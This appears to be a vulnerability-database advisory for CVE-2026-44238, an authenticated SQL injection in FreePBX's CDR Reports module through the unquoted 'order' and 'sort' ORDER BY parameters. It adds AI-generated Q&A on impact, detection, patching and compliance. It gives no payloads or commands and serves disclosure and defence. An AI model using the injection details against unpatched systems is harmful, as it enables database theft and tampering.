CVE-2026-44238
SQL Injection in FreePBX CDR Reports Module
Publication date: 2026-05-29
Last updated on: 2026-05-29
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| freepbx | freepbx | to 16.0.50 (exc) |
| freepbx | freepbx | to 17.0.11 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-44238 is an authenticated SQL injection vulnerability in the CDR Reports module of FreePBX versions 16 and 17. It occurs because the `order` and `sort` POST parameters are improperly handled and directly inserted into the ORDER BY clause of SQL queries without proper sanitization.
The function used to process these inputs, `escapeSimple()`, only escapes single quotes, which does not prevent SQL injection in this context where the parameters are unquoted.
To exploit this vulnerability, an attacker needs access to a FreePBX Administration Control Panel account with CDR section privileges, but full administrator rights are not required.
Successful exploitation could allow the attacker to execute arbitrary SQL commands, potentially exposing sensitive data within the database.
How can this vulnerability impact me? :
This vulnerability can have a significant impact by allowing an attacker with limited privileges to perform SQL injection attacks on the FreePBX database.
Such an attack could lead to unauthorized access to sensitive data stored in the database, compromising confidentiality.
It may also affect the integrity of the data by allowing modification or deletion of records.
Because the attack vector is network-based and requires only low attack complexity, it poses a high risk if an attacker gains the necessary access.
Mitigation involves updating FreePBX to versions 16.0.50 or 17.0.11 or later, restricting access to the Administration Control Panel, and using firewall protections.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability involves SQL injection through the order and sort POST parameters in the CDR Reports module of FreePBX. Detection would require monitoring or testing these specific POST parameters for injection attempts.
Since exploitation requires authentication with a FreePBX Administration Control Panel account that has CDR section access, detection can include reviewing logs for suspicious POST requests to the CDR Reports module containing unusual or malformed order or sort parameters.
No specific detection commands are provided in the available resources.
What immediate steps should I take to mitigate this vulnerability?
The primary mitigation step is to update the FreePBX CDR Reports module to version 16.0.50 or later for FreePBX 16, or version 17.0.11 or later for FreePBX 17, where this vulnerability is fixed.
- Restrict access to the FreePBX Administration Control Panel, especially limiting accounts with CDR section privileges.
- Use the FreePBX Firewall module to block hostile networks from accessing the administration interface.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability allows an attacker with access to a FreePBX Administration Control Panel account with CDR section privileges to perform SQL injection, potentially exposing sensitive data stored in the database.
Exposure of sensitive data due to this vulnerability could lead to non-compliance with data protection regulations such as GDPR and HIPAA, which require the protection of personal and health-related information from unauthorized access.
Therefore, if exploited, this vulnerability could compromise confidentiality and integrity of data, impacting compliance with these common standards and regulations.